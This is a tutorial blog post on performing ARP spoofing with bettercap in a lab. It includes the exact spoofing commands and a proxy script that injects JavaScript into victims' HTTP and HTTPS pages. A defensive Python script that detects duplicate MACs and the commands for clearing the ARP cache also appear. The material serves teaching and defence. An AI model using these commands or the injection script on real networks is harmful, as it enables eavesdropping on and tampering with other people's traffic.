bettercap — ARP spoofing function

Disclaimer: This article is only for study, research and discussion. You must not use it for anything illegal or against the rules!

Hello everyone, let’s talk about ARP spoofing today.

When two devices communicate within a LAN, they use the ARP protocol to determine each other’s physical address (MAC address). ARP spoofing is a network attack technique that exploits the working principle of the ARP protocol to deceive other devices.

Imagine you are chatting with your friends over a shared network. Your computers all have unique IP addresses and MAC addresses. When you want to send a message to your friend, your computer sends a broadcast request asking who has the MAC address corresponding to your friend’s IP address. Your friend’s computer will receive this request and reply back to your computer, telling you what its MAC address is.

In an ARP spoofing attack, the attacker sends a false response claiming to have the MAC address corresponding to an IP address. That way, when you send a message to your friend, your computer will mistake the attacker’s computer for your friend’s computer and send the message to the attacker. Attackers can eavesdrop, modify, or intercept your communications without your knowledge.

In other words, ARP spoofing is like someone pretending to be your friend, standing between you and your friend, eavesdropping and tampering with the conversation between you. This allows attackers to obtain your sensitive information, login credentials, or perform other malicious actions against you.

The tool used here is called bettercap, which ships with Kali. (The target machine should preferably be a virtual machine; it is best not to test on a physical machine, otherwise the network connectivity may be a bit problematic.)

The first step is to determine the IP address of the target machine. On the target machine, run:

ipconfig

The IP address is 192.168.x.xx

Then enter arp -a to view the ARP table.

  • Interface: Display the network interface to which the ARP table belongs, where “192.168.xx.x” is the IP address of the interface.
  • Internet Address: Displays the known IP addresses of other devices.
  • Physical Address: Displays the MAC address corresponding to each IP address, which is used to uniquely identify the physical address of the device.
  • Type: Indicates how the IP-to-MAC mapping was learned. There are two types in this ARP table: dynamic (learned from ARP replies and expiring after a timeout) and static (configured manually and not expiring).

Next we start bettercap on Kali.

The first time you start it, it will prompt you to install the tool.

Then enter bettercap to start it.

like this

Set the address to be spoofed. We use the target machine address obtained earlier with ipconfig.

1. Set the IP address to be spoofed; if it is not set, the default is the whole subnet.

set arp.spoof.targets 192.168.xx.xxx

2. Start spoofing.

arp.spoof on

It reports that arp.spoof cannot find the spoofing target.

What is going on?

It is because our target machine is on the wireless network, while the attacking machine is on a NAT network.

In this case, the arp.spoof command cannot be used directly. The reason is that the NAT network performs network address translation for the devices connected to it, so the attacking machine sits on its own virtual subnet rather than on the same layer-2 segment as the Wi-Fi network, and ARP only works within one layer-2 segment. The attacker therefore cannot send a forged ARP reply into the Wi-Fi network.

So we set the attacking machine Kali to a bridged network. We configured this before and can switch directly.

Here we run ifconfig.

What are all these interfaces?

Creating multiple container environments with Docker on Kali will cause you to see many network interfaces; this is normal behaviour. Each Docker container gets its own network namespace and is assigned a virtual network interface, so when you start multiple Docker containers you will see many newly added network interfaces.

Here are some commands to deal with these network interfaces.

Run the following command to list the names of the Docker bridge networks:

docker network ls --filter driver=bridge --format '{{.ID}}: {{.Name}}' | awk -F': ' '{print $2}'

The following command removes all unused Docker networks (and their virtual bridge interfaces):

docker network prune --force

Then run ifconfig again:

Done.

When switching to a bridged network, remember to change the VM’s network adapter from NAT to bridged.

Then repeat the arp.spoof command.

Spoofing succeeded.

Let’s take a look at arp -a

The first entry is the MAC address of the gateway and the fourth is the MAC address of my Kali machine. These two are the same: after ARP spoofing, the MAC address recorded for the gateway is the MAC address of our attacking machine.

The spoofing worked.
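The observation above (the gateway and another host sharing one MAC in the arp -a table) is exactly what a defender looks for. The following is an added example, not code from the original article or from bettercap: a small Python script that parses arp -a style output (and Linux ip neigh output) using the fields described earlier (Internet Address, Physical Address, Type), and reports any MAC address claimed by more than one unicast IP, plus the specific check of whether the gateway's MAC is also claimed by another host. The sample tables and all addresses are constructed placeholders, and the gateway IP is an assumption passed in by the caller.

```python
import re
from collections import defaultdict

# Constructed sample output in the format of `arp -a` on Windows.
# All addresses are placeholders, not values from the article.
SAMPLE_WINDOWS_ARP = """\
Interface: 192.168.1.20 --- 0x5
  Internet Address      Physical Address      Type
  192.168.1.1           aa-bb-cc-11-22-33     dynamic
  192.168.1.7           00-11-22-33-44-55     dynamic
  192.168.1.30          aa-bb-cc-11-22-33     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# Constructed sample output in the format of `ip neigh show` on Linux.
SAMPLE_LINUX_NEIGH = """\
192.168.1.1 dev eth0 lladdr aa:bb:cc:11:22:33 REACHABLE
192.168.1.30 dev eth0 lladdr aa:bb:cc:11:22:33 STALE
192.168.1.7 dev eth0 lladdr 00:11:22:33:44:55 DELAY
192.168.1.50 dev eth0 FAILED
"""

IP_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")
MAC_RE = re.compile(r"\b([0-9a-fA-F]{2}(?:[-:][0-9a-fA-F]{2}){5})\b")


def parse_arp_table(text):
    """Return (ip, mac, type) tuples; MACs normalised to lowercase colon form.

    Lines without both an IPv4 address and a MAC (headers, FAILED entries)
    are skipped. The type is 'static' for Windows static / Linux PERMANENT
    entries and 'dynamic' otherwise.
    """
    entries = []
    for line in text.splitlines():
        if line.lstrip().startswith("Interface:"):
            continue  # Windows header: the interface's own IP, no MAC
        ip = IP_RE.search(line)
        mac = MAC_RE.search(line)
        if not (ip and mac):
            continue
        typ = "static" if re.search(r"static|PERMANENT", line) else "dynamic"
        entries.append((ip.group(1), mac.group(1).lower().replace("-", ":"), typ))
    return entries


def find_duplicate_macs(entries):
    """Map each MAC shared by more than one unicast IP to the sorted IPs using it."""
    by_mac = defaultdict(list)
    for ip, mac, _ in entries:
        # Broadcast and IPv4 multicast mappings legitimately repeat; ignore them.
        if mac == "ff:ff:ff:ff:ff:ff" or mac.startswith("01:00:5e"):
            continue
        by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def check_gateway(entries, gateway_ip):
    """Return other IPs that share the gateway's MAC (empty list means no sign of spoofing)."""
    macs = {ip: mac for ip, mac, _ in entries}
    gw_mac = macs.get(gateway_ip)
    if gw_mac is None:
        return []
    return sorted(ip for ip, mac in macs.items() if mac == gw_mac and ip != gateway_ip)


def report(text, gateway_ip):
    """Print a short human-readable summary for one ARP table dump."""
    entries = parse_arp_table(text)
    dups = find_duplicate_macs(entries)
    suspects = check_gateway(entries, gateway_ip)
    print(f"{len(entries)} entries parsed")
    for mac, ips in dups.items():
        print(f"  MAC {mac} is claimed by {', '.join(ips)}")
    if suspects:
        print(f"  WARNING: gateway {gateway_ip} shares its MAC with {', '.join(suspects)}")
    else:
        print("  gateway MAC is unique")


if __name__ == "__main__":
    # Assumption: 192.168.1.1 is the gateway in the constructed samples.
    report(SAMPLE_WINDOWS_ARP, "192.168.1.1")
    report(SAMPLE_LINUX_NEIGH, "192.168.1.1")
```

On a real machine, pipe the actual table into the parser (for example the output of arp -a or ip neigh show) and pass your real gateway address. A duplicate MAC is a strong indicator but not proof: some setups (NIC teaming, a router that answers for several addresses) legitimately share one MAC, so treat a hit as something to investigate rather than an automatic verdict.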

Now we can write a proxy script in any directory. I saved mine as 1.js in /home/yan8925298:

function onResponse(req, res) {
    // only handle HTML responses
    if (res.ContentType.indexOf('text/html') == 0) {
        var body = res.ReadBody();
        // insert the script just before the closing </head> tag
        if (body.indexOf('</head>') != -1) {
            res.Body = body.replace(
                '</head>',
                '<script type="text/javascript">alert("your computer has hacked!")</script></head>'
            );
        }
    }
}
  • Start bettercap.
  • Run the following commands:

    set arp.spoof.targets 192.168.x.x,192.168.x.xxx  # Set the ARP spoofing targets: here the gateway and the target machine

    set http.proxy.script /home/yan8925298/1.js  # Inject the script into HTTP traffic

    set https.proxy.script /home/yan8925298/1.js  # Inject the script into HTTPS traffic

    http.proxy on  # Enable the HTTP proxy

    https.proxy on  # Enable the HTTPS proxy

    arp.spoof on  # Enable ARP spoofing

  • If it runs normally without reporting an error, it will start listening on port 8080. If that port is already in use, it will exit right after you run the command, so make sure port 8080 is free.

  • This is a screenshot of the result.

Clearing the ARP cache on the target machine can help restore normal network operation after an ARP spoofing attack.

windows:arp -d

linux: sudo ip neigh flush all